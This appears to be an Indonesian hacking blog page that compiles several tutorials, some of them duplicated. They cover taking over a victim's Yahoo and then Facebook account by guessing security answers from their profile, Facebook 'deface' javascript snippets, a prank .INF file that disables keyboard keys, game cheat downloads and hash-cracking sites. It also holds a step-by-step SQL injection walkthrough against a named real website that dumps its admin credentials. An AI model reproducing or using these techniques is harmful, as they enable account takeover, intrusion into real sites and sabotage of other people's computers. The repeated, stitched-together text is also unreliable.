mmmmmmmm,,,,yang ini kita mesti kerja ekstra chuy.,.hikz.,.coba az dekati target.,.lalu nanya-nanya gt dech.,.yg ujung2x mengarah pd pertanyaan yang kita butuhkan.,
4. apa nama hewan peliharaan anda???
coba buka f0to-ft0 target..kL0 munk dy jujur.,.biasax ada f0to binatang kesayanganx tuch.,.hihihi.,.tinggal cek2 sajjah......
5. apa nama sekolah dan lain..lain....
intinya kreative lach kita menjawab ujian yang di berikan yahoo tersebuk.,.ckckckck
anggap kita suda berhasil menjawab pertanyaan pertama dari yahoo scurity team.,.hahay.,.
akan ada pertanyaan ke dua.,.yang biasanya lebih gampang lagi.,.hihii
antara lain yang sering keluar
apanama merek motor / mobil pertama anda??
siapa nama pengarang favorit anda??
music fav0rit anda??
dimana anda bertemu pasangan anda?
dan lain sebagaix,.,
setelah berhasil melewati ujian kita akan diminta untuk memasukan password baru.,.
pada dasarnya smwa jawaban itu ada pada inf0 yang di berikan user di akun facebookx..
jadi kesimpulannya....email adalah kunci...kita & kelemahan user sering menganggap email hal yang gampang & menyepelekanx...
bahkan ada user yang tidak pernah sama sekali membuka emailx.,.jd y...pnya email cM buat bikin akun fabook sajjah .titik..
wew,,,parah........
orang-orang bginiLah yang biasanya menjadi k0rban.,.ckckckk
kl0 email korban sudah di tangan kita y...tinggal forgot password az kn di facebook...berezzz,,,
s0 jangan pernah menganggap sepeLe masaLah emaiL..^_^
sumber : http://rakhjib.blogspot.com/
dengan cara mengelabui tanpa perlu melakukan hal-hal yang biasa dilakukan seorang cracker. Ada pula
yang mengatakan sebagai psychological tricks terhadap orang yang memiliki hak akses pada suatu sistem
sebagai upaya untuk mengambil informasi yang dibutuhkan. Atau bisa dianggap sebagai seni
memanfaatkan kelemahan-kelemahan manusia seperti sikap tak acuh, naif atau keinginan natural manusia
yang ingin disukai orang lain.
daripada bengong saia coba menuliskan bagaimana take0ver facebook dengan memanfaatkan kelemahan user
lalu bagaimana caranya Tuan Muda????heee..sering dapat pertanyaan gitu saia.,baiklah.,.,.m0ga sajja dengan tulisan ini bisa terjawab.AMIN
yang pertama cari email target..usahakan yahoo dech..hihihi
lalu masuk ke yahoo truz klik I can't acces my account atau saya tidak dapat mengakses email saya
truz akan muncul pilihan masalah apa yang anda hadapi..yuhu.,.yahoo munk baik bgd yak.,.^_^
klik next sajjah lach.,lalu diminta memasukan email alternatif.,.wew.,.biLang az ga punya,,heee
s0 pilih yang bawah atau saia tidak dapat mengakses email alternatif saia juga.,hahahaha
nach..masukan email target tadi lalu masukan juga scurity c0dex..truz next lg...
wew,,,hehehee..ujian dimulai...ay0 jawab pertanyaan scurity dari target kita..hahay,,
ada bermacam pertanyaan yang di tawarkan yahoo..
apabila user menggunakan pertanyaan default dari yahoo maka hal ini bisa memudahkan kita dalam memasuki paksa emailx.,.
biasanya pertanyaan yang muncul
1. dimanakah anda berbulan madu???
berdasarkan hasiL survey & pengalaman rata-rata user menjawab
bali
lombok
jepang
venezuela
rumah
dirumah
dan lain-lain.,.hihihi...kal0 tetap gagaL bisa cek kota asal target kita di inf0 facebookx..coba az dimasukan biasanya berhasiL
2. tanggal lahir & k0de pos..???
ini lebih gampang lagi karena biasanya di inf0 facebookx user juga membiarkan tanggal lahir terlihat begitu sajja..heee
*lalu kede posx Tuan?????
itu bisa di atasi...buka az situs pos ind0nesia..hahahahhaaa.,.masukan kota target kL0 ada alamat rumahx.,.lebih gampang lg..hikz.,.nanti dikasih tw sm pak p0s onlinex
3. siapa nama belakang paman kesayangan anda???
mmmmmmmm,,,,yang ini kita mesti kerja ekstra chuy.,.hikz.,.coba az dekati target.,.lalu nanya-nanya gt dech.,.yg ujung2x mengarah pd pertanyaan yang kita butuhkan.,
4. apa nama hewan peliharaan anda???
coba buka f0to-ft0 target..kL0 munk dy jujur.,.biasax ada f0to binatang kesayanganx tuch.,.hihihi.,.tinggal cek2 sajjah......
5. apa nama sekolah dan lain..lain....
intinya kreative lach kita menjawab ujian yang di berikan yahoo tersebuk.,.ckckckck
anggap kita suda berhasil menjawab pertanyaan pertama dari yahoo scurity team.,.hahay.,.
akan ada pertanyaan ke dua.,.yang biasanya lebih gampang lagi.,.hihii
antara lain yang sering keluar
apanama merek motor / mobil pertama anda??
siapa nama pengarang favorit anda??
music fav0rit anda??
dimana anda bertemu pasangan anda?
dan lain sebagaix,.,
setelah berhasil melewati ujian kita akan diminta untuk memasukan password baru.,.
pada dasarnya smwa jawaban itu ada pada inf0 yang di berikan user di akun facebookx..
jadi kesimpulannya....email adalah kunci...kita & kelemahan user sering menganggap email hal yang gampang & menyepelekanx...
bahkan ada user yang tidak pernah sama sekali membuka emailx.,.jd y...pnya email cM buat bikin akun fabook sajjah .titik..
wew,,,parah........
orang-orang bginiLah yang biasanya menjadi k0rban.,.ckckckk
kl0 email korban sudah di tangan kita y...tinggal forgot password az kn di facebook...berezzz,,,
s0 jangan pernah menganggap sepeLe masaLah emaiL..^_^
sumber : http://rakhjib.blogspot.com/
FB Deface
1. deface facebook javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
2. java mengundang ke group javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] ==='object'){fs.click(elms[fid]);}}
3. Javascript google script melayang2 wkwkw javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i
4.Trik berikut ini memang usil dan hanya untuk pengetahuan dan coba-coba saja.
Mohon jangan disalahgunakan untuk menjaili komputer teman anda.
a. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
---------------------------------------
[Version]
Signature="$Windows NT$"
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,"SYSTEM\CurrentControlSet\Control\Keyboard Layout","Scancode Map",0x1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,17,00,00,00,18,00,00,00,16,00,00,00,00,00
---------------------------------------
b. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
c. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
---------------------------------------
[Version]
Signature="$Windows NT$"
[DefaultInstall]
DelReg =normal
[normal]
HKLM,"SYSTEM\CurrentControlSet\Control\Keyboard Layout","Scancode Map"
---------------------------------------
---> Simpan dengan nama "NORMAL.INF"
Klik kanan file ini, pilih >Install
Log Off komputernya.
4. deface photo profil FB
javascript:void(document.getElementById('profile_pic').src='http://photos-e.ak.fbcdn.net/hphotos-ak-snc3/hs504.snc3/26503_105459932814874_100000526024390_162553_4651985_n.jpg');
untuk nmr 4
dapat juga mnggunakan foto semau kita
2. java mengundang ke group javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] ==='object'){fs.click(elms[fid]);}}
3. Javascript google script melayang2 wkwkw javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i
4.Trik berikut ini memang usil dan hanya untuk pengetahuan dan coba-coba saja.
Mohon jangan disalahgunakan untuk menjaili komputer teman anda.
a. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
---------------------------------------
[Version]
Signature="$Windows NT$"
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,"SYSTEM\CurrentControlSet\Control\Keyboard Layout","Scancode Map",0x1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,17,00,00,00,18,00,00,00,16,00,00,00,00,00
---------------------------------------
b. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
c. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
---------------------------------------
[Version]
Signature="$Windows NT$"
[DefaultInstall]
DelReg =normal
[normal]
HKLM,"SYSTEM\CurrentControlSet\Control\Keyboard Layout","Scancode Map"
---------------------------------------
---> Simpan dengan nama "NORMAL.INF"
Klik kanan file ini, pilih >Install
Log Off komputernya.
4. deface photo profil FB
javascript:void(document.getElementById('profile_pic').src='http://photos-e.ak.fbcdn.net/hphotos-ak-snc3/hs504.snc3/26503_105459932814874_100000526024390_162553_4651985_n.jpg');
untuk nmr 4
dapat juga mnggunakan foto semau kita
Ch34t Wall H4ck PB
Dengan cara menggunakan Cheat Wallhack Point Blank, kita bisa melihat lawat tanpa terlihat lawan.
1. Download Cheatnya Di : http://www.ziddu.com/download/11390763/pb_wallhack.zip.html
2. Buka Hasil Download Cheat Wall Hack Point Blank tadi.
3. kemudian ekstrak ke Dekstop
4. Setelah itu klik tulisan pb_wallhack.exe akan keluar gambar seperti dibawah.
Kemudia buka Game Online Point Blank Sampai Pilih Server yang anda inginkan (pertama kalijangan masuk dulu)
• Ketik angka 3 tunggu 4 detik
• Ketik angka 8 tunggu 3 detik
• Ketik angka 7 tunggu 1 detik langsung ketik angka 1,2,3 dengan cepat.
• Kalau berhasil pasti ditengah anda tanda + (plus)
Berikut ini Daftar cheat Point blank :
1. Chat Ga bisa ma ti-mati, darah 2000/berapa terserah. ( chat, hack, point blank unlimited HP )
2. Chat mati kalo cuma kena HS doang. ( Headshot only )
3. Chat Bikin 1 Hit kill. musuh 1x tembak lansung mati. ( damage UP/ Hit Kill )
4. Bisa Edit2 darah(HP) punya musuh atau temen. ( Hack Hp 1 room )
5. Peluru ga abis2 Ga Reroad. (unlimiter Ammo)
6. Terbang/ Tembus Tembok
7. New Cheat Walhack pointblank, (Tembus pandang, tembus pandang tembok)
8. Auto aim Headsout, (cheat Headshout)
9. Damage Up
ini semua real Cheat Pb ga ada rekayasa.. nama cheat ini adalah cheat Izzye Engine V.6.
buat kalian yang suka main FUN di Pb.
Dwoanload Cheat Di :http://www.ziddu.com/download/11391030/Izzye_point_blank.zip.html
k3yb0rd hacking p4da wind0wS
Keyboard Hacking Pada Windows
[Author : Lirva32]
--- 00 // Intro ----------------------------------------------------------
Hai, ketemu lagi dengan lirva32! Pada artikel ini, saya akan menjelaskan
bagaimana melakukan hacking terhadap Control dan Stag Control Keyboard
dalam Windows Operating System.
--- 01 // Memperlambat Control Keyboard -----------------------------------
Wow, kita bisa membuat respon keyboard menjadi saaaaangat lambat! User
menjadi tidak bisa menekan tombol yang sama untuk beberapa saat.
Misalkan, seorang user ingin menekan tombol ENTER berulangkali, maka
setiap penekanan tombol terdapat jeda waktu sekitar 20 detik. Hal tersebut
akan berlaku untuk penekanan tombol yang sama secara berulang.
Ingin mencobanya? Berikut adalah langkah-langkah melakukan Control
Keyboard Hacking:
01. Pastikan Anda mempunyai akses ke Control Panel. Jika tidak memiliki
akses, dapat menggunakan eksploit yang bisa didapat di
http://www.petri.co.il/. Pada website tersebut, Anda dapat
mempelajari bagaimana melakukan teknik eksploitasi Windows lainnya.
02. Akses Control Panel -> Accessibility Option -> Keyboard
03. Beri tanda check pada 'Use FilterKeys' --> klik Settings
04. Pilih 'Ignore Repeated Keystrokes' -> klik Settings
05. Isi 'Ignore Keystrokes Repeated Faster Than = 2.0 seconds'
Jangan lupa buat semua tanda check pada 'Notification'
06. Klik 'OK' -> 'OK' -> 'Apply' -> 'OK'
07. Jreeeeeng! Jreeeeeng! Jreeeeng!
Untuk mencobanya, silakan membuka text editor dan mengetikkan
tombol yang sama secara berulang-ulang. Anda akan merasakan
lambatnya akses pada keyboard.
--- 03 // Melumpuhkan Stag Control Keyboard ------------------------------
01. Akses Control Panel.
02. Akses Control Panel -> Accessibility Option -> Keyboard
03. Beri tanda check pada 'Use FilterKeys' --> klik Settings
04. Pilih 'Ignore Quick Keystrokes and Slow Down The Repeat Rate'
Jangan lupa buat semua tanda check pada 'Notification'
05. Klik Settings
06. Isi 'Repeat Delay = 2.0'
07. Isi 'Repeat Rate = 2.0'
08. Isi 'Key Must Be Held Down For = 2.0'
09. Jreeeeeng! Jreeeeeng! Jreeeeng!
Keyboard menjadi tidak dapat digunakan walaupun keyboard sudah
digantikan dengan yang baru.
--- 04 // Penutup --------------------------------------------------------
Tulisan ini hanya ditujukan untuk pembelajaran.. jika terjadi tindakan
destruktif yang merugikan pihak lain, Cyber4rt Crew dan penulis tidak akan
bertanggung jawab. Mohon tidak mempraktekkan isi tulisan ini
pada lingkungan kampus/pendidikan, sosial dan lingkungan lainnya
yang sangat memerlukan informasi.
Posting By: cyber4rt.com
M3nGenal Type HAsh
Kenali type Hash kamu...
[ Author : dy4z m4ti R4s4
Buat temen2 yg udah pada jago sqli pasti pernah mengalami kesulitan
untuk mengenali jenis hash yg kalian temukan,
sedikit info aja tentang tipe2 hash oke langsung aja
Kenali tipe hash kamu
1.MD5(Message-Digest algortihm 5)
=> MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan
hash function sebelumnya, MD4. Pada tahun 1996 (wikipedia)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan
oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b
2.MD5($pass.$salt)
=> digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari hashnya duluan
kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73
3.MD5($salt.$pass)
=> digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari saltnya duluan kemudian
dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d
4.md5(md5($pass).$salt)
=> digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2
5.MD5(Wordpress)
=> digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan
oleh sebuah karakter (karakter yg paling sering dipakai
adalah huruf "B")
kemudian dilanjutkan oleh saltnya
(8 karakter yg disusun secara acak,
dalam contoh ini saltnya adalah "12345678")
lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01
6.MD5(phpBB3)
=> digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter
(karakter yg paling sering dipakai adalah nomor "9"),
kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak,
dalam contoh yg saya berikan saltnya adalah "12345678")
kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120
7.SHA-1(Secure Hash Algorithm)
=> diciptakan oleh National Institue of Standars and
Technology atau U.S.
Federal Information Processing Standard
digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab
8.SHA-256(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $5$ kemudian
dilanjutkan dengan saltnya
(8 karakter yg disusun secara acak, dalam
contoh yg saya berikan saltnya adalah
"12345678") lalu dilanjutkan oleh karakter "$"
kemudian dilanjutkan oleh hashnya.
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...
9.SHA-512(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $6$ kemudian
dilanjutkan dengan saltnya
(8 karakter yg disusun secara acak, dalam contoh
yg saya berikan saltnya adalah
"12345678") lalu dilanjutkan oleh karakter "$"
kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...
10.Base64
=> algoritma yg berfungsi untuk encoding dan
decoding suatu data ke dalam
format ASCII. panjang maksimal 64 karakter hashnya terdiri
dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter
terakhir yang bersimbol yaitu + dan / serta satu buah karakter
sama dengan "="
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=
situs untuk mengcrack hash :
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan
yang kamu ambil untuk mencari jawaban. jika kamu membutuhkan bantuan,
jangan bertanya untuk mendapatkan jawaban, bertanyalah tentang jalan
yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri...
dy4z [RCC]
di ambil dari :cyber4rt.com
TUTORIAL SQL INJECTION STEP BY STEP [DUMMIES]
TUTORIAL SQL INJECTION STEP BY STEP [DUMMIES]
[ Author : Hacker Liar ]
Sebelum men daface sebuah situs, kita bisa menggunakan dork Sql
Injection dengan bantuan om kita semua ( mbah google )
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
trus yg saya dapat :
http://www.geic.co.id/detailproduct.php?id=75
untuk mengecek bug pada suatu web tambahkan
single quote ( ' ) dibelakang url
http://www.geic.co.id/detailproduct.php?id=75'
ternyata ada bug-nya, muncul pesan error :
You have an error in your SQL syntax; check the manual
that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat'
at line 1
Untuk mencari column gunakan perintah [ order by ]
http://www.geic.co.id/detailproduct.php?id=75 order by 1--
dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan error
pada target kita kali ini, error muncul pada angka 19
http://www.geic.co.id/detailproduct.php?id=75 order by 19--
muncul pesan error:
Unknown column '19' in 'order clause'
jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)
Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan
injection dengan perintah "union all select"
http://www.geic.co.id/detailproduct.php?id=-75
union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75
akan muncul "angka ajaib" : 3, 11 dan 18
kita pilih salah satunya saja, misal 3
trus kita cari versi Database MySql-nya dengan perintah [version()]
atau [@@version] pada angka 3
http://www.geic.co.id/detailproduct.php?id=-75 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
muncul tulisan :
5.0.90-community
wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :p
nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi
table dan column dari information_schema,
dimana information_schema tidak terdapat pada database MySql versi 4.
Jadi kalau targetnya mempunyai database MySQL versi 4,
yang kita lakukan yaitu menebak-nebak tablenya... lol
Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)"
pada salah satu angka ajaib
dan "+from+information_schema.tables+where+table_schema=database()--" di
belakang angka 18
http://www.geic.co.id/detailproduct.php?id=-75 union all select 1,2,group_concat
(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+
from+information_schema.tables+where table_schema=database()--
akan muncul nama-nama table :
login,tbanner,tcatprod,tproduct,tset
Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://snarkles.net/scripts/sneak/sneak.php
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e
Perintah selanjutnya adalah "group_concat(column_name)"
pada angka ajaib 3 dan "+
from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
http://www.geic.co.id/detailproduct.php?id=-75 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--
muncul column : user,pass
untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat
(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL
ganti column 1 dengan "user" dan column2 dengan "pass"
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama
"login"
http://www.geic.co.id/detailproduct.php?id=-75 union all select
1,2,group_concat(user,0x3a,pass),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--
hasil : admin:admin
jadi,
user = admin
password = admin
Selesai ??? belum....wkwkwkwk :p
Langkah selanjutnya adalah mencari Admin Page target kita.
Anda bisa menggunakan "adminfinder" atau "scanlink.py"
download di mari : http://www.ziddu.com/download/10386415/InstantSQLI.rar.html
di sini bisa tonji : http://revtan.site40.net/admin/
Klo ada yg dapat admin pagenya tolong jangan di deface, supaya web
ini bisa dipake untuk pembelajaran... :lol:
Download Video Di Facebook
Gini nich cara download video di facebook, browser yang digunakan harus mozilla firefox. Belum punya? silakan download dsini : http://www.mozilla.com/products/download.html?product=firefox-3.5.2&os=win〈=en-US
1. Buka browser anda (Mozilla FireFox)
2. Klik : https://addons.mozilla.org/en-US/firefox/addon/9614 > Klik Add to FireFox > Instal dech!
3. Setelah proses instalasi selesai, restart browser anda (Mozilla Firefox)
4. Login ke account facebook anda, cari/pilih video yang akan di download.
5. Lihat disamping atau dibawah video akan ada link download
Subscribe to:
Posts (Atom)